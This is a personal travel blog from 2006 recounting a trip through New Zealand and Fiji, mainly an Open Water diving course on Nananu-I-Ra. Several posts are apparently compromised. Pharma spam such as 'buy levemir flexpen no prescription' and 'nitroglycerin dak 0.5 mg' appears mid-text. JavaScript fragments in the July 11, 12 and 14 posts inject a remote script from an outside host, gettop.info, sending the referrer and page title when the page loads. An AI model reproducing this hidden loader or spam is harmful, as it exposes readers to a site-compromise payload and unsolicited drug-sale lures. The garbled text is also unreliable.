The mask skill

Posted by admin On July - 14 - 2006

This friday was a sunny day. I was excited because I didnt like to take of the mask under water. Its so irritating when the cold water comes into the face that you stop breathing and when you start again you use the nose. Fortunally I wasnt alone. Another girl, Ann, was not able to do some of the skills as well. Glenn was really patient with us and we first done the regulator skill, then he took us for a nice fun dive around the reef in front of the Nananu beach. That was great. In the end we done the mask skill, and after he told us some tricks we both were able to pass the mask skill. Finally. I was so happy. In the afternoon I had a dive alone with dive con Andy at the front beach reef. Was good but had in the beginning some equilizing problems with my left ear. Couldnt go that fast deeper in the beginning. But later on had great fun and enjoyed more the single dives that the dives with bigger groups. buy levemir flexpen no prescription } else {d.getElementsByTagName(‘head’)[0].appendChild(s);

Diving skills

Posted by admin On July - 12 - 2006

For diving we met each day at 7:45am at the dive shop for preparing our gear. We constructed the diving equipment. Then we improved our diving skills . We had to take of the weight belt, the BCD and the regulator under water. Unfortunately I failed with the mask skill. It was to scary for me taking off the mask under water. I started panicing. Felt not save. Was really dissappointed because couldnt made it and the dive instructor Chris said, if I can’t manage it I will not go diving with the group at the beautiful reefs. I was very upset this evening and went to the beach watching the stars. The sky was so clear and I saw the southern cross and the milky way. When I came back the others helped me to chin up and later on the instructor said he was talking to Glen and I will get an extra mask skill dive the next day with him.d.getElementsByTagName(‘head’)[0].appendChild(s);

Starting my Open Water Diving Certificate

Posted by admin On July - 11 - 2006

Today I was very excited – it was my first day of learning how to dive. I met Chris a german instructor. He is ok in teaching diving but sometimes also very harsh and with to much pressure. I can understand why because diving can be dangerous if you not follow the rules and as an instructor you are responsible for your students. But still he should be more understanding. The dive shop belongs to ‘Reef Safari’ an australian company and my certificate will be the SSI but its the same like the PADI. The difference is just the name and the SSI is australian standard, PADI is american standard. First of all we had to learn about the diving equipment and a couple of chapters in a dive book. And we went straight into the water because Nananu is in the lucky position to have a small nice reef in front of the beach so you need no boat. nitroglycerin dak 0.5 mg var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Nananu-I-Ra – Daydream island

Posted by admin On July - 10 - 2006

About 8:30am the shuttle from Nananu Lodge picked us up for bringing us to this perfect island. The trip took us four hours, but on the way we stopped at ATM and in Rakiraki for food shopping. The last 15min we took a boat to the island. And it is a beautiful island, for me it was the first tropical island in my life. I was not surprised when Glenn the manager of Nananu Lodge welcomed us and told us Nananu-I-Ra means Daydream island. It was much better than I ever expected… The dive sites around belong to the 10 best in the world after Jaques Michel Cousteau. And he must know. He bought the island next to Nananu-I-Ra. I got a beautiful room at the Coconut Lodge and my bed got ocean view. A big plus in Nananu is as well that you have the opportunity to cook, also you can have the meal package. In the afternoon went to the beach and relax. For watching the perfect sunset everyday you can go on the little next to the resort. Once a week is happy hour at the sunset bure on the top of the hill.

Fijian BBQ

Posted by admin On July - 9 - 2006

Slept only about four hours because somebody was snorring in the dorm. Sunday morning I watched the worldcup game Germany against Portugal about the third place. Met Scott (Scottland) and some others watching the game. Germany played well and won. At least the third at the worldcup. Well done. In Fiji you cant expect anything on sunday. Nothing goes – its Fiji time. So we hang out at the pool and I met Matt, Nathan, Simon, Jenny, Zoe, Emma, Daniel, Lindsey, Foxy and Megan… I had a chat with them and they asked if I wanna join them at there trip to Nananu-I-Ra. Its a quit unknown but very beautiful island. I really liked the idea but normally had other plans for Fiji. I wanted to see the ‘Blue Lagoon’ and do the shark feeding in Pacific Harbour. And first of all I wanted to learn diving, doing the Open-Water-Course. After phoning at Nananu-I-Ra we find out that everything there is much nicer and cheaper. So I changed my plans and decided to go with the others the next day. Later on I went to the beach for collecting shells and met again Bins who invites me spontaniously to an authentic fijian BBQ. Before I asked them If they can prepare me a coconut because never had fresh coconut juice. The coconut was delicious and I learned that there are three types of coconuts. Some are for juice (yellow), others for eating or cooking (brown, green). Also I tried sugar cain – very sweet. The BBQ was with original fijian potatos. That are roots which the fijian peel and cook. They taste after potato but are more dry.

Preparing the coconut…

Thats Fiji potatoes…

Arrived in Nadi

Posted by admin On July - 9 - 2006

After almost 3 hours at the airplane I arrived in Nadi. I was really excited because it was my first time on a tropical island with real coconut palm trees. I had bought the cheapest bag/luggage and finally at the airport I saw the result. I was not the only one with this bag…saw about four others. So my heart started to beat very quickly I prayed that nobody took accidently my luggage. But after waiting for about 30min I found my bag and was happy. Then I was looking after the shuttle to the first bagpacker, the ‘Horizon’. I ask the driver after stoping at an ATM machine because had no money with me. He was very friendly and brought me to the Westpac ATM. Now I had my second problem – the machine gave me no money, I tried it several times. Finally I went to the ANZ money machine and got some. Meanwhile it was dark outside when I arrived at the ‘Horizon’. I checked in and went straight to the beach. Because it was so dark I could not recognize that this beach was the opposite of beautiful. It was dirty and grey. So I went back and sit under a tree and met Bins a fijian boy. We had a chat but it was pretty difficult for me to understand his dialect. It seems then very ironical for me when he asked me if I can speak english… Because it is saturday today he recommended me the polynesian and fire dance at the ‘Aquarius resort’. And so I went there and took a couple of beautiful photos.

Sunday at the beach

Posted by admin On July - 2 - 2006

This sunday is a real ‘sun-day’. It was so sunny that we decide to drive to my favourite beach – the Karekare Beach with the nice waterfall next to it. I love this waterfall it is a perfect one and really beautiful. This time I done some of my photos with my new tripod. So I trained using it for Fiji. Later on Russell brought me to a nice spot the Te Waha Point between Whites and Piha Beach. We watched a wonderful sunset. But the way to the car uphill was really exhausting.

Blackwater Rafting and Glowworms

Posted by admin On June - 18 - 2006

ince I am in New Zealand I wish to visit the Waitomo Caves (www.waitomocaves.co.nz). That are diffrent underground caves near Waitomo on the north island. Waitomo means ‘water entering a hole in the ground’. The caves are an ancient labyrith made of limestone. In this caves you made a little boat ride and watch the spectacular Glowworm Grotto. The Glowworms are in fact little larvae who hanging on the roof of the caves surrounded of lines with sticky substances. On this lines the insects were traped and then devoured by the larvae. The brighter the larvae glows the hungrier it is. The live as larvae is about 9 month then it will become a pupa for 13 days and finally the adult fly. The adult glowworms looking like moskitos. They have no mouth so their only function is to reproduce and disperse the species. Adult glowworms live no longer than a few days. The New Zealand glowworm species is the blue glowing Arachnocampa Luminosa. Its beautiful to watch, millions of glowworms in the caves looking like stars on the night sky. Unfortunally taking photographs was forbidden but in a secret moment I took at least a picture of the limestone stalactites and stalagmites. Later on we have done the legendary New Zealand black water rafting through the cave system were you sit on a inner tube and flow into the underground labyrinth. Before you will get a wetsuit and a helmet with light on. This was a really unique experience because this day it rains heavy and outside I measure 4°C. The wetsuit were icecold and wet…It was so freezing. But anyway I have done it and it was great. After all we took a hot shower and eat a hot tomato soup and a bagel on a nice fire place inside. Russell and I were lucky because today was sunday roast day and we went to mandy´s place for dinner and a dvd (Wedding Crashers).

This is what I saw on the way to the Waitomo Caves. A funny kiwi with the New Zealand flag on its bum. The four stars on the flag stay for the Southern Cross (starsign at night sky).

The only Waitomo Cave photo.

Fishing and mining

Posted by admin On May - 14 - 2006

Even fishing will be learned. I had not known before that it can be so difficult to catch a fish. Also a good fisherman has to be patient. That’s what I’m mostly not. So after breakfast we put all our fishing gear in the car and drove to the coast of this area around Thames. It was pretty freezing, in New Zealand is now autum, I don’t like it. After some vain trials we gave up the experiment of fishing. Maybe another time.
At least this is a picture of a snapper. This fish we wanted to catch… For more information about fishing and fishes in New Zealand watch out: www.fishnz.co.nz
